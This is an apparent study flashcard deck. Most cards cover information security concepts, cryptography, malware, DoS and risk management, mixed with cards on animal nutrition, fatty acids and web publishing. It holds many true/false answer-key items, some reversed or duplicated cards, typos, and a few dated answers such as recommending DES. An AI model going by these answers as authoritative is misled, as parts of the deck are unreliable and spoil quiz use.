Clock-based tokens do not require interaction with the host before authentication takes place. Challenged-based tokens do not require a synchronized clock.
Role
Collection of procedures or jobs that the subject performs.
Multi-factor authentication
Combines multiple authenticator categories
Who is the Commonwealth Privacy Act 1988 applied to?
Commonwealth and ACT government agencies
[1.2] Which information asset was targeted when researchers attacked Jeep Cherokee?
Communications between the cellular network, the car, the entertainment system software and the other control systems for the vehicle.
Uses of RC4
Communications: - SSL/TLS for internet traffic - Wireless networks - IEEE 802.11 Wired Equivalent Privacy (WEP) - IEEE 802.11i WiFi Protected Access (WPA & WPA2)
Logic Bomb
Computer code that lies dormant until it is triggered by a specific logic event.
Internet
Computer network with information and communication facilities of interconnected networks using standardized communication protocols
In order to recover or prevent worm attacks:
Computer with proper password policy Current security update Antivirus or security software Secured shares are protected from infections
Who is Cracker?
Computer-savvy programmer creates attack software
Energy: Outline
Concept in Nutrition Partitioning or Distribution Species differences Energy Density Predicting the requirement -Body weight -Growth -Temperature / activity effects Effect of energy on feed intake Feed efficiency Regulation of feed intake
In the U.S. military classification scheme, ____ data is any information or material the unauthorized disclosure of which reasonably could be expected to cause damage to the national security.
Confidential
Securitypolicy - Goals/objectives
Confidentiality
Cryptography is used for which CIA?
Confidentiality Integrity Authenticity
[3.6] Employee finds USB in foyer and accesses it. Outline likely threats.
Content is potentially malicous
Risk ____ is the application of controls to reduce the risks to an organization's data and information systems.
Control
Access control
Controlloing or restricting the use of information assets and/or resouces.
Alert message
Conveys TLS related alerts to other parties. Two levels: Warning - notifies other party that connection may be unstable. Fatal - notifies other party pf unrecoverable error or compromise in security
What is phishing.
Cybercriminals pretend to be a trustworthy source in order to acquire sensitive personal information such as usernames, passwords, date of birth, passport details, and credit card details.
Major risk is a combined function of (1) a threat less the effect of threat-reducing safeguards, (2) a vulnerability less the effect of vulnerability reducing safeguards, and (3) an asset less the effect of asset value-reducing safeguards.
False
Metrics-based measures are generally less focused on numbers and more strategic than process-based measures.
False
There are individuals who search trash and recycling — a practice known as ____ — to retrieve information that could embarrass a company or compromise information security.
Dumpster Diving
Mutually exclusive means that all information assets must fit in the list somewhere.
False
Once the organizational threats have been identified, an assets identification process is undertaken.
False
Barry discovers that an attacker is running an access point in a building adjacent to his company. The access point is broadcasting the security set identifier (SSID) of an open network owned by the coffee shop in his lobby. Which type of attack is likely taking place?
Evil twin
A single loss ____________________ is the calculation of the value associated with the most likely loss from an attack.
Expectancy
One problem with benchmarking is that there are many organizations that are identical.
False
"If you realize you do not know the enemy, you will gain an advantage in every battle." (Sun Tzu)
False
A best practice proposed for a small home office setting is appropriate to help design control strategies for a multinational company.
False
A dictionary password attack is a type of attack in which one person, program, or computer disguises itself as another person, program, or computer to gain access to some resource.
False
A phishing attack "poisons" a domain name on a domain name server.
False
A rootkit uses a directed broadcast to create a flood of network traffic for the victim computer.
False
Program-specific policies address the specific implementations or applications of which users should be aware.
False
A security policy is a comparison of the security controls you have in place and the controls you need in order to address all identified threats.
False
A(n) disaster recovery plan dictates the actions an organization can and perhaps should take while an incident is in progress.
False
ALE determines whether or not a particular control alternative is worth its cost.
False
An attacker uses exploit software when wardialing.
False
Protocols are activities performed within the organization to improve security.
False
Authorization controls include biometric devices.
False
CBAs cannot be calculated after controls have been functioning for a time.
False
Comprehensive means that an information asset should fit in only one category.
False
Qualitative-based measures are comparisons based on numerical standards, such as numbers of successful attacks.
False
Continuity of critical business functions and operations is the first priority in a well-balanced business continuity plan (BCP).
False
Each of the threats faced by an organization must be examined to assess its potential to endanger the organization and this examination is known as a threat profile.
False
Eliminating a threat is an impossible proposition.
False
Every organization should have the collective will and budget to manage every threat by applying controls.
False
Identifying human resources, documentation, and data information assets of an organization is less difficult than identifying hardware and software assets.
False
If every vulnerability identified in the organization is handled through mitigation, it may reflect an inability to conduct proactive security activities and an apathetic approach to security in general.
False
In information security, benchmarking is the comparison of security activities and events against the organization's future performance.
False
Information security managers and technicians are the creators of information.
False
Internal benchmarking can provide the foundation for baselining.
False
Criminals
Create & sell bots -> generate spam Sell credit card numbers, etc...
Non-repudiation
Create evidence that action has occurred, so user cannot falsely deny the action later.
Webpage spoofing
Creating a fake webpage that looks like the page for a legitimate business to trick users.
Hybrid Cryptosystems
Cryptosystems can be combined 1. Use asymmetric cipher to provide confidentiality for a particular short message: a randomly chosen shared secret key. 2. Symmetric cipher is uses shared secret key for encrypting the bulk data.
Human vulnerabilities
Cyber security training including social engineering, passwords, best practices, etc. We are vulnerable because our information technology is fragile and susceptible to a wide range of threats including: § Natural disasters. § Structural failures. § Cyber attacks. § Human errors. § Human attitude. § Technology failures. § Complex interactions. § Financial constraints. § Lack of expertise. § Out of control technologies and environments.
Know yourself means identifying, examining, and understanding the threats facing the organization.
False
Likelihood risk is the risk to the information asset that remains even after the application of controls.
False
Many corporations use a ____ to help secure the confidentiality and integrity of information.
Data Classification Scheme
Which item in a Bring Your Own Device (BYOD) policy helps resolve intellectual property issues that may arise as the result of business use of personal devices?
Data ownership
Information assets
Data, device or component that supports information related activities. Need to be protected from illicit access, use, disclosure, alteration, destruction and theft.
Which of these is not a state of data that DLP examines?
Data-In process
[9.3] Alice wants to send a confidential message to Bob. They do not have an existing shared secret key. Suppose that Alice and Bob agree to use an asymmetric cipher (RSA). Bob has a public key K_(Bpub) and the associated private key K(Bpriv). Outline the set of steps that Bob must follow to decrypt the ciphertext received from Alice.
Decrypt: 1. Receive ciphertext C 2. Decrypt ciphertext using agreed asymmetric cipher decryption algorithm (RSA) and the key K_(Bpriv) to recover message M where M=D(C, K_(Bpriv)) 3. Decode message (if necessary)
The ____ strategy attempts to prevent the exploitation of the vulnerability.
Defend Control
Denial of Service attacks (DoS)
Deny's authorised users access to the system. UDP Flood, TCP SYN Flood, ICMP Flood, Smurf IP attack. Nuke Attack: Tie computer up.
[CRYPTO] What type of measure if implemented to ensure message maintains integrity?
Detective. You can't prevent it being altered but can check if it has been.
Bomb Calorimeter
Determination of Gross energyof a feed, ingredient, fecal sample Principle: -A known amount of sample is combustedin the reaction chamber and the resultingheat (as measured by the increase in thetemperature in the water bath) is determined. 1 kcal = 1000 calories 1 gram carbohydrate = 4 kcal 1 gram lipid = 9 kcal 1 gram protein = 5-6 kcal 1 gram ethanol = 7 kcal
Energy Partitioning
Determination of Gross, Digestible, Metabolizable Energy is relatively simple -Analyze Feed, feces and urine. Determination of heat increment, heat production and components of net energy is more difficult.
Which is the first step in securing an operating system?
Develop security policy
Which is the first step in securing an operating system?
Develop the security policy
Shodan
Device search engines. Permits searching by IP address, open port, Active protocol, Vulnerability number
Energy Distribution, Partitioning, Utilization Metabolizable Energy (ME)
Digestible Energy (DE) Metabolizable Energy (ME) = digestible E -(urinary+gas energy) Urinary energy -breakdown products of metabolism -urea Gas Energy -methane, hydrogen -used in ruminants -ignored in non -ruminants Corn: DE = 3,451 kcal/kg (as fed) ME = 3,395 kcal/k
Energy Distribution, Partitioning, Utilization Net Energy
Digestible Energy (DE) MetabolizableEnergy (ME) Net Energy (NE) = metabolizableE -heat increment Heat increment = heat production associated with nutrient digestion and metabolismand the heat of fermentation .Heat increment is heat that is wasted or lost to the environment, but may also contribute to body temperature.] Corn:ME = 3,395 kcal/kgNE = 2,672 kcal/kg
Due ____________________ is the demonstration that the organization is diligent in ensuring that the implemented standards continue to provide the required level of protection.
Diligence
The concept of competitive ____ refers to falling behind the competition.
Disadvantage
The practice is similar to eavesdropping but is not limited to gaining access to data
Disclosure or snooping
Management of classified data includes its storage and ____.
Distribution, Destruction, and Portability
[6.1] According to Section 6 of the Australian Privacy Act 1988, what does 'record' mean?
Document or database or photograph or other pictorial representation of a person.
a. in-band key exchange
Elliptic Curve Diffie-Hellman (ECDH) is an example of ______________. a. in-band key exchange b. out-of-band key exchange c. SHA-1 key management d. AES key certification
Securitycountermeasures/mechanisms
Encrypt data • Use DES encryption
[9.3] Alice wants to send a confidential message to Bob. They do not have an existing shared secret key. Suppose that Alice and Bob agree to use an asymmetric cipher (RSA). Bob has a public key K_(Bpub) and the associated private key K(Bpriv). Outline the set of steps that Alice must follow to encrypt a message to send to Bob.
Encrypt: 1. Prepare message M - may include coding it as an integer 2. Encrypt message using agreed asymmetric cipher encryption algorithm (RSA) and the key K_(Bpub) to produce ciphertext C where C=E(M,K_(Bpub)) 3. Transmit ciphtertext C to Bob
Ciphertext (C)
Encrypted plaintext, transformed so the message is now 'hidden'
Caesar Cipher
Encryption = step forward n places in the alphabet. Decryption = step back n places in the alphabet. Secret key = n
Asymmetric Cryptography (Public Key)
Encryption and Decryption Keys are DIFFERENT. and disclosing one does not compromise the other.
Symmetric Cryptography (Secret Key)
Encryption and Decryption Keys are the SAME. Key (K) must be kept secret = has to be distributed or stored securely. Threat of confidentiality breach of key.
Symmetric Cipher (Secret Key Cipher)
Encryption key IS THE SAME AS decryption key (or one key can be easily deduced from the other)
Example of Preventative controls
Encryption of files
Is energy an essential nutrient?
Energy can come from CHO, AA or Fat. -CHO free diet ? -Fat free diet ? -Protein free diet? 25 lb pig -Eating 1.0 kg feed (corn / soy diet with 20% CP) -Gaining 0.5 kg per day
Availability
Ensure resources ACCESSIBLE when required by authorized user.
TCP (Transmission Control Protocol)
Ensure what sent arrives reliably and in order.
Penetration
Entering the system using information discovered up till now
Identification
Entity requesting access presents an identifier to the system
Recent security breaches
Equifax (2017) Wannacry (2017) Yahoo (2016, 2014, 2013)
XXS countermeasures
Escape untrusted data. validate output
Energy
Essential nutrient •Sources: CHO, lipid, protein •Definition: -ability to do work •Measured in terms of heat production
Transport layer
Establishes basic data channels for applications. Uses ports to distinguish between different applications on the same host.
HTTP security
Exposed to interception, no encryption. Poor integrated security.
[6.2] What was the purpose of amending (National Privacy Principles) the Aust. Privacy Act 1988?
Extend coverage of the Privacy Act to the private sector (with some exemptions)
All information that has been approved by management for public release has a(n) ____________________ classification.
External
A(n) ____ is an authorization issued by an organization for the repair, modification, or update of a piece of equipment.
FCO
Which type of attack involves the creation of some deception in order to trick unsuspecting users?
Fabrication
Which one of the following is an example of a direct cost that might result from a business disruption?
Facility repair
Operational ____________________ analysis examines user acceptance and support, management acceptance and support, and the overall requirements of the organization's stakeholders.
Feasibility
List the privacy legislation in Australia
Federal - Commonwealth Privacy Act 1988 - Privacy Ammendment (Private Sector) Act 2000 - Privacy Amendment (Enhancing Privacy Protection) Act 2012 State - Information Privacy Act 2009 (QLD)
Energy Utilization
Feed (gross energy) -fecal = Digestible Energy (DE) -Urinary (and gas) energy = Metabolizable (ME) -heat increment = Net energy (NE) -maintenance + production NEm + NEp
Energy Distribution, Partitioning, Utilization Digestible Energy
Feed= gross energy Feces = fecal energy Digestible Energy (DE) = Feed energy -fecal energy DE can be used to describe the diet or ingredients in the diet.Corn: GE = 3,933 kcal/kg (as fed)' DE = 3,451 kcal/kg
FTP
File Transfer Protocol
The military uses a ____-level classification scheme.
Five
Reconnaissance
Footprint, Scan and Enumerate. Aim is to find attack vectors
Why is access control important
Fundamental aspect of information security because unauthorised access to resources or authorised users misuing resources can compromise CIA (Confidentiality, Integrity, Availability).
The difference between an organization's measures and those of others is often referred to as a performance ____________________.
Gap
The ____ security policy is an executive-level document that outlines the organization's approach and attitude towards information security and relates the strategic value of information security within the organization.
General
Health Issues Related to Fatty Acid Chemistry
General: -Fat has 2.25x the calories of CHO or protein Saturated Fat: -Animal fats, hydrogenated plant oils -Solids at room temperature -Tend to raise serum cholesterol Unsaturated Fats: -Plant oils, fish oil -Liquids at room temperature -Tend to lower serum cholestol -Type of unsaturated is important •Monounsaturated (olive oil) •Trans fat •Omega-3 vs omega-6
Heats of Combustion for Various Nutrients
Glucose 3.74 Sucrose 3.94 Starch 4.18 Cellulose 4.18 Butter 9.1 Corn oil 9.4 Palmitate 9.4 Average Protein 5.65 Casein 5.90 Glycine 3.11 Tyrosine 5.90 Urea 2.52 Ethanol 7.11
Link Layer
Governs communication between adjacent nodes in a network. Knows how to pass a message to a MAC address
______ allows for a single configuration to be set and then deployed to many or all users.
Group policy
______________ allows for a single configuration to be sent and then deployed to many or all users.
Group policy
[5.2] List four basic properties of hash functions.
H1: The message can be any length but the hash value is always a fixed length. H2: H(M) is one-way - you can compute the hash value from the input message but you can't compute the input message from the hash value H3: H(M) is collision resistant - it's hard to find distinct messages with the same hash value H4: If you make a small change in the message the hash value majorly changes
[4.1] Resource Owners
Have responsibility for the resource objects, control them, give access privileges and implement access control mechanisms.
Heat Increment
Heat increment is highest for fiber (fermentation heat) Lowest for fat.
[5.8] Can you think of an example where it is more important that the false match rate must be very low?
High security where critical only authorized user allowed. Better to lock out authorized than allow unauthorized.
Gap time
How long between each key press
Dwell time
How long each key is pressed on keyboard
Behavior Control Firewall Technique
How services are used. Limits web. Filters spam.
Daily Energy Intake
Human: 2500 (2000-3000) kcal/day Pigs: -Typical diet = 3200-3400 kcal/kg -Growing pigs: 10 Mcal/d (3 kg feed/d) -Lactating sow: 20-40 Mcal/d (6-12 kg feed/d) Horse: -13-20 Mcal/d -Forage (1.8-2.1 kcal.kg) + Concentrate (3.0-3.4 Mcal/kg)
Essential Fatty Acid Requirements
Humans: -Some references indicate Linoleic Acid and Linolenic are essential -Others include archidonic acid -Some may also include EPA and DHA -Elongation/desaturation limited in infants (add ARA, DHA to formula) Primates: -DHA shown to be essential for nervous tissue and retina Cats: -Linoleic acid relieves many symptoms of EFA deficiency -Arachidonic acid needed to normalize reproduction in female cats -Diet should contain 0.5% Linoleic acid and 0.02% Arachidonic Horses: -There are no reports of EFA deficiencies -Recommend 0.5% Linoleic Acid Poultry: -No establish requirements for Linolenic Ruminants: -No direct measures of EFA requirements in ruminants -Evidence suggests that typical diets are adequate
HTML
Hypertext Markup Language
HTTP
Hypertext Transfer Protocol
Firewall Limitations
IP spoofing, each app needs special treatment, outside machines need to know about gateway, can't blacklist everything. Communication vs Security
The actions an organization can and perhaps should take while an incident is in progress should be specified in a document called the ____ plan.
IR
b. Alice's public key
If Bob wants to send a secure message to Alice using an asymmetric cryptographic algorithm, which key does he use to encrypt the message? a. Alice's private key b. Alice's public key c. Bob's public key d. Bob's private key
FIN Scanning
If port is in LISTEN, no reply. If port is closed, responds with reset.
How many keys are required in asymmetric cryptography?
If there are n participants then you need a total of n key pairs.
Fatty Acid Profile
In non-ruminants, the tissue fatty acid profile reflects the diet the animal was fed.It is possible to significantly modify the type of fatty acid by changing diet.
Ciphers used for confidentiality
In storage: Microsoft's Encrypting File System, BitLocker Being transmitted: SSL/TLS, IPSec, WEP, WPA Processing: Crypto not good for hiding information when it is being processed.
[5.8] How can you reduce FMR?
Increase threshold.
Breach of Availability
Information assets are not accessible when required by an authorised entity.
Breach of Integrity
Information assets have been modified or destroyed by unauthorised entity.
Breach of Confidentiality
Information is disclosed to unauthorised entities.
[6.1] According to Section 6 of the Australian Privacy Act 1988, what does 'personal information' mean?
Information or an opinion, whether true or not, and whether recorded in material form or not, about an individual whose identity is apparent, or can reasonably be ascertained from information or opinion.
[6.1] What sort of privacy is the Australian Privacy Act 1988 concerned with?
Information or data privacy.
[6.1] According to Section 6 of the Australian Privacy Act 1988, what does 'sensitive information' mean?
Information or opinion about an individuals: - racial/ethnic origin - political opinion/membership - religion - philosophic beliefs - membership of trade union/professional assoc. - sexual preference - criminal record - health info - genetic info
Oral Contraceptives are Steroid Hormones
It is estimated that 11 million women in the US take oral contraceptives. Types: -Combination •Estragen+ Progestin ( levonorgestalor Norethindrone) -Progestin only -Levonorgestal: •Dose is 100-250 μg /day or 30μg/day depending on type•binding affinities at human steroid hormone receptors are: 323% that of progesterone at the progesterone receptor, 58% that of testosterone at the androgen receptor, 17% that of aldosterone at the mineralocorticoid receptor, 7.5% that of cortisol at the glucocorticoid receptor, and <0.02% that of estradiol at the estrogen receptor. -EthinylEstrogen 20-100 μg /day It would take the equivalent of 10,000 quarter pound burgers to provide the same dose per day.
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a random to be able to decrypt their files. It is likely that CryptoLocker used hybrid encryption. Explain how it may have done so and why.
It is likely CryptoLocker used RSA and AES together in a hybrid encryption, since RSA public key encryption is much slower than symmetric ciphers.
What is an ste file used for?
It is used to quickly open your site without having to specify your local site folder and remote publishing information each time you open DreamWeaver
Which statement about a man trap is true?
It monitors and controls two interlocking doors to a room
Which statement about mantrap is true?
It monitors and controls two interlocking doors to a room
Why would you not use Vernam OTP?
Key Management. - Same keystream is required to encrypt and decrypt and you can't reuse keys. Must be able to distribute and store key securely. If you can do this securely you may as well send/store the original message securely.
Is key distribution an issue for asymmetric cryptography?
Key distribution is not an issue. Anyone may know the public key and everyone has their own private key.
Which of the following is NOT a Microsoft Windows setting that can be configured through a security template?
Keyboard Mapping
Which of the following is not a Microsoft Windows setting that can be configured through a security template?
Keyboard mapping
The residential lock most often used for keeping out intruders is the _______________.
Keyed entry lock
[5.3] Which property of cryptographic hash functions is required in order for S/KEY to be secure?
Knowing any one-time password does not give away the next one-time password. The next password when hashed gives the current password. Hash function must satisfy the one-way property (difficulty inverting them).
Internet bot
Known as web robots, are automated internet applications controlled by software agents § These bots interact with network services intended for people, carrying out monotonous tasks and behaving in a humanlike manner (i.e., computer game bot) § Bots can gather information, reply to queries, provide entertainment, and serve commercial purposes. § Botnet - a network of "zombie" computers used to do automated tasks such as spamming or reversing spamming
[3.4] Is disposing of the used photocopier considered a threat, vulnerability or an attack?
Leaves organisation vulnerable. Threat that unauthorized person can access data. If they gain access then confidentiality breached and security incident occurs. Lack of knowledge and failure in policy of asset disposal = vulnerabilities.
____________________ is the probability that a specific vulnerability within an organization will be successfully attacked.
Likelihood
Essential Fatty Acids Linoleic and a-linolenic
Linoleic (ω-6) = C 18:2 Δ 9,12 -Can be made into Arachidonic •(ω-6)= C 20:4 Δ 5, 8,11, 14 α-Linolenic (ω-3)= C18:3 Δ 9, 12,15 -Can be made into: •EPA* (ω-3) 20:5 Δ5, 8, 11,14,17 •DHA* (ω-3) 22:6 Δ4, 7, 10, 13,16,19
Nomenclature
Linoleic Acid: CH3(CH2)4CH=CHCH2CH=CH(CH2)7COOH Delta: Δ (18:2 Δ 9,12) -count from carboxyl end Omega: ω (18:2 ω-6) or "n" (18:2 n-6) -count from methyl end Ex: Oleic Acid= C 18:1 cis-9, Δ-9, or ω -9
Conjugated Linoleic Acid
Linoleic acid (18:2, cis-9, cis-12) is an essential fatty acid and has a methylene-interrupted arrangement of double bonds (unconjugated). C9=C10-CH2-C12=C13- CLA is a mixture of positional (8/10, 9/11, 10/12, 11/13) and geometric (cis/trans, trans/cis, c/c, t/t) isomers of linoleic acid with double bonds in a conjugated diene arrangement. -CH2-C9=C10-C11=C12-C13-CH2-
Logic Bombs
Logic Bomb: Malware logic executes upon certain conditions. The program is often used for otherwise legitimate reasons. Examples: • Software which malfunctions if maintenance fee is not paid. • Employee triggers a database erase when he is fired.
Which type of denial of service attack exploits the existence of software flaws to disrupt a service?
Logic attack
____ addresses are sometimes called electronic serial numbers or hardware addresses.
MAC
MITM Fabrication
MITM creates information and sends it claiming to be someone else.
MITM Modification
MITM modifies the information then sends it.
Classes of Nutrients
Macronutrients: -Water -Carbohydrates (energy) -Lipids (energy) -Proteins / Amino Acids (energy) Micronutrients: -Minerals -Vitamins
Computer Virus
Malicious computer code that, like its biological counterpart, reproduces itself on the same computer.
Malware
Malicious software deliberately designed to breach security of computer based information systems. Can affect CIA depending on payload action.
How does Malware work?
Malicious software is created to damage/disable computer systems, steal data, or gain unauthorized access to networks or computing resources.
What's the impact of Malware?
Malware can delete files or directory information, or it may allow attackers to covertly gather personal data, including financial information, and usernames and passwords.
Polymorphic Malware
Malware code that completely changes from its original form whenever it is executed.
How does Malware happen?
Malware may be installed on a computer when a user clicks an unsafe link, opens an infected file, or visits a legitimate website that could contain adware/malware.
Oligomorphic Malware
Malware that changes its internal code to one of a set number of predefined mutations whenever it is executed.
Ransomware
Malware that encrypts users computer files and demands a payment to permit decryption e.g. Breaking Bad computer ransomware demanded $1000 to decrypt files it infects.
Ransomware
Malware that prevents a user's device from properly operating until a fee is paid.
Metamorphic Malware
Malware that rewrites its own code and thus appears different each time it is executed.
Network vulnerabilities
Man in the middle attacks, Router attacks, Ethernet traffic sniffing, DNS attacks
Spoofing
Masking the source of a communication (phone or email) to look like a reputable source (e.g. government, call within a company, etc.).
What is Spoofing?
Masking the source of a communication (phone or email) to look like a reputable source (e.g. government, call within a company, etc.).
Formulating Diets for Livestock and Poultry
Meeting the energy requirement: -Cattle: DE, TDN, NEG -Dairy: DE, NEL -Horses: DE, TDN -Pigs: DE,ME, NE -Poultry: ME, AME, TME
[9.4] Why is symmetric cryptography alone unable to provide non-repudiation?
Message authentication using a MAC only shows that one of the parties who knows the shared secret key formed the MAC (for example shopper and merchant), and a third party (judge) will not be able to decide which of those two parties performed the action.
Diffie-Hellman Key Agreement Algorithm
Method for securely exchanging cryptographic keys over a public channel. - Uses modular exponentiation - Relies on difficulty of discrete logarithms for security (g^b)^a = g^(ab) mod p (g^a)^b = g^(ab) mod p
Vulnerabilities
Mistakes in programs that allow bad things to happen Biggest vulnerability: USERS Cross site scripting, Cross site request forgery, cookie injection
The ____________________ control strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation.
Mitigation
[9.2] What sort of mathematics is required to perform Diffie-Hellman key agreement?
Modular exponentiation: integer exponentiation over a finite set of integers. The modulus is a prime number.
Which of the following is not a motion detection method?
Moisture
Fat Quality
Moisture, Impurities, Unsaponifiables -(MIU index) -Has little direct effect on nutritional value of fat -Collectively, they dilute the energy Moisture: -high level can accelerate oxidation and rancidity Impurities: -Dirt, hair, protein Unsaponifiables: -Sterols, other hydrocarbons that are not saponified -Usually not digestible Free Fatty Acid (FFA, %) -Measures fatty acids not esterified to glycerol -Heat and moisture increase [FFA] -May also come from soapstock added back to feed (cottonseed, soybean oil processing) -FFA have reduced digestibility Total Fatty Acids (TFA): -Typical triglyceride is 10% glycerol and 90% fatty acid
Layered Security
Most sensitive information is accessed by the least number of people. Internal access controls are placed on data. Cheaper and simpler than perimeter security. Widely used in business
Distributed Denial of Service (DDoS)
Multiple compromised machines sends too many legitimate requests for computer to handle. Attacking machine completes three way handshake. No IP spoofing. Attacker uses zombies to make many legitimate requests. Master is the attackers machine. Handlers are zombies that have 1000 agents. Agents perform the DDos itself.
What is NOT a commonly used endpoint security technique?
Network firewall
[9.2] One problem with Diffie-Hellman key agreement is that each entity has no assurance about the identity of the entity they are communicating with. What sort of attack is possible as a result of this problem and what impact does this have on the security of subsequent communications?
No authentication means Man-In-the-Middle (MIM) attack is possible. - MIM can establish keys with sender and receiver and send messages pretending to be either of them. - Communications aren't really secure: Attacker can view and modify communications so Confidentiality and Integrity can be breached.
What level of technology infrastructure should you expect to find in a cold site alternative data center facility?
No technology infrastructure
Conversion of Dietary Fat to Body Fat
Non-ruminants: (pig, chicken, dog, cat, human, horse, fish) -"You are what you eat" -Feeding unsaturated fat in the diet results in unsaturated fat in body tissues Ruminants: (cattle, sheep, deer) -Biohydrogenationconverts UNSAT to SAT -Difficult to change the fatty acid profile of meat and milk from ruminants
What is P = D(C,Kpriv)?
Notation for asymmetric decryption. Plaintext = Decryption (Ciphertext, Private Key)
What is C = E(P,Kpub)?
Notation for asymmetric encryption. Ciphertext = Encryption (Plaintext, Public Key)
Perimeter Security
Nothing leaves unless explicitly authorized. All information is checked at perimeter. Used in contexts where any leaked information is bad. Government, Military. Expensive and complex.
SSL (Secure Sockets Layer)
Now called TLS (Transport Layer Security)
Denial of Service (DoS) Attack
Objective is to make an information asset or resource unavailable to authorised user.
Attacks
Occur when vulnerabilities are deliberately exploited.
[9.1] How many keys are required for two people to communicate confidentially using symmetric cipher?
One shared key is required.
____ feasibility analysis examines user acceptance and support, management acceptance and support, and the overall requirements of the organization's stakeholders.
Operational
Behavioral feasibility is also known as _________________________.
Operational Feasibility
Maria's company recently experienced a major system outage due to the failure of a critical component. During that time period, the company did not register any sales through its online site. Which type of loss did the company experience as a result of lost sales?
Opportunity cost
Transmission Control Protocol (TCP)
Optimized for reliability. Connection oriented protocol. Make two way channel between hosts. Handshaking protocol to secure connection.
User Datagram Protocol (UDP)
Optimized for speed
Plaintext (P)
Original message or data
What's the impact of Credential Replay?
Our client's account is compromised, and the cybercriminal can quickly re-use their credentials to access other accounts, and steal additional funds and confidential data before detection.
Security Concepts
Owners, usefulness, availability, assets, Risk, threat, vulnerability, exploit, countermeasures, attackers
Physiological Fuel Values (PFV)
PFV = ME values -CHO = 4 kcal/g -Fat = 9 kcal/g -Protein = 4 kcal/g •Used on food labels for calculation of Calories
c. non-repudiation
Proving that a user sent an email message is known as ______________. a. repudiation b. integrity c. non-repudiation d. availability
personal identification number
PIN
Holly would like to run an annual major disaster recovery test that is as thorough and realistic as possible. She also wants to ensure that there is no disruption of activity at the primary site. What option is best in this scenario?
Parallel test
Objects
Passive entities in the system that contain or receive information. Objects are repositories of information such as disks, files and datasets. Objects are the resources being accessed.
A hospital is planning to introduce a new point-of-sale system in the cafeteria that will handle credit card transactions. Which one of the following governs the privacy of information handled by those point-of-sale terminals?
Payment Card Industry Data Security Standard (PCI DSS)
Which one is not a typical baseline configuration?
Performing a security risk assessment
Attacker
Person who deliberately attempts to exploit a vulnerability to gain unauthorized access or perform unauthorized actions.
What is the most common form of Social Engineering
Phishing
Link layer
Physical communication layer. Local. Protocol operations: - Ethernet - WLAN (WEP) - ADSL - 3G etc.
Tokens
Physical key, swipe card, ID badge etc. Can generate sequence of one-time passwords.
Binary Additive Stream Cipher
Plaintext, keystream and ciphertext are all streams of bits, combining operation is just XOR (addition modulo 2). - Do NOT provide integrity protection
[7.1] What TCP port is reserved for SSH connections?
Port 22
Information security
Preservation of confidentiality, integrity and availability of information; in addition, other properties such as authenticity, accountability, non-repudiation and reliability can also be involved.
Confidentiality
Prevent unauthorized DISCLOSURE of information.
Integrity
Prevent unauthorized MODIFICATION or DESTRUCTION of information.
[CRYPTO] What type of measure is implemented to ensure message is confidential?
Preventative
Need to know principle
Principle of least privilege in the case that the resource is information : only given info you need to perform your job.
privacy
Privacy - Individual or organization cannot be identified with sensitive information. - 25, Bank street, Doha (Public) - Address of Khaled is: 25, Bank street, Doha (Privacy issue) - Anonymity is related to privacy. 16
How do Asymmetric ciphers for integrity work?
Private key = digital signature for a particular message or file. Public key used to verify digital signature on message: - Provides authentication of sender - Since only signer knows private key they are only one who can generate digital signature
Productivity Improvements
Productivity improvements in plant and animal agriculture were done by simple selection for the better producing animals.
The ____ security policy is a planning document that outlines the process of implementing security in the organization.
Program
Trojan horses
Programs with known desirable properties and hidden undesirable property.
Viruses
Programs with the ability to replicate. Spreads by copying itself into other files (infecting) and is activated when these files are open or executables are run.
Worms
Programs with the ability to self replicate. Spread from computer to computer without human interaction.
Amphipathic Lipids
Property whereby regions of a molecule are hydrophobic and regions are hydrophillic. •Types of Amphipathic Lipids -Phospholipids -Free Fatty acids -Free Cholesterol
IP Security (IPsec) - Internet layer
Provides security services at the IP level and is used to provide Virtual Private Network (VPN) services. Network security protocol.
WiFi security (WEP, WPA) - Link layer
Provides security services at the link layer for wireless communication. Network security protocol.
d. perfect forward secrecy
Public key systems that generate random public keys that are different for each session are called __________________. a. Public Key Exchange (PKE) b. Elliptic Curve Diffie-Hellman (ECDH) c. Diffie-Hellman (DH) d. perfect forward secrecy
What folder do you publish to in your astro account
Public_html
Handshaking Protocol
Purpose 1. server authentication 2. negotiation 3. key establishment 4. client authentication (maybe)
[9.6] Ransomware such as CryptoLocker uses encryption to encrypt the files on a victim's computer, then demands that they pay a random to be able to decrypt their files. Why does the design of the system make it impossible for users to decrypt the files on their own?
RSA public key was generated by the control server and the RSA private key was never copied to the user's computer, so the user does not have access to the private key to decrypt the files.
[5.8] What does False Match Rate (FMR) mean?
Rate at which biometric measurements from two different persons are incorrectly declared to be from the same person.
[5.8] What does False Non-Match Rate (FNMR) mean?
Rate at which two biometric measurements from the same person are incorrectly declared to be from two different persons.
What are Stream ciphers used for?
Real-time applications where time delays are unacceptable. (They are fast) E.g. 1. Communications, including internet traffic - RC4 2. Mobile telephony - A5/1 and A5/2 in GSM standard 3. Video (pay TV) - Digital Video Broadcasting (DVB) uses Common Scrambling Algorithm
Which group is the most likely target of a social engineering attack?
Receptionists and administrative assistants
Typo Squatting
Redirecting a user to fictitious website based on a misspelling of a URL. also called URL hijacking.
URL hijacking
Redirecting a user to fictitious website based on a misspelling of a URL. also called typo squatting.
Botnet
Refers to a collection of computers autonomously or automatically working together toward some goal; these are often zombie computers that are synchronized to perform illegal activities on the internet ex. money
Information Theft
Refers to the access of information by an unauthorized person for financial gain or benefit
Internet Security
Refers to unique threats and defenses associated with computers connected to the internet
Improving DDos
Reflection attacks and Amplification attacks
Which of the following is NOT an activity phase control?
Resource control
Example of Corrective controls
Restore apps to last known good image to bring corrupted system back online.
Relationship of Intake to Energy Retention
Retained energy = protein and lipid deposition Determined using comparative slaughter technique. Can also be milk production in dairy
[9.4] What is non-repudiation?
Security service that ensures that users cannot falsely deny an action has occurred.
Metamorphic Virus
Rewrites itself into a logically equivalent form. entire virus is rewritten on every infection. Works in a different way, but same results.
Polymorphic Virus
Rewrites itself into a semantically equivalent form. randomly mutates decryption routine. No consistent signature for AV to look for.
____ equals likelihood of vulnerability occurrence times value (or impact) minus percentage risk already controlled plus an element of uncertainty.
Risk
Which formula is typically used to describe the components of information security risks?
Risk = Threat X Vulnerability
The first phase of risk management is ____.
Risk Identification
____________________ involves three major undertakings: risk identification, risk assessment, and risk control.
Risk Management
____________________ is the process of identifying risk, as represented by vulnerabilities, to an organization's information assets and infrastructure, and taking steps to reduce this risk to an acceptable level.
Risk Management
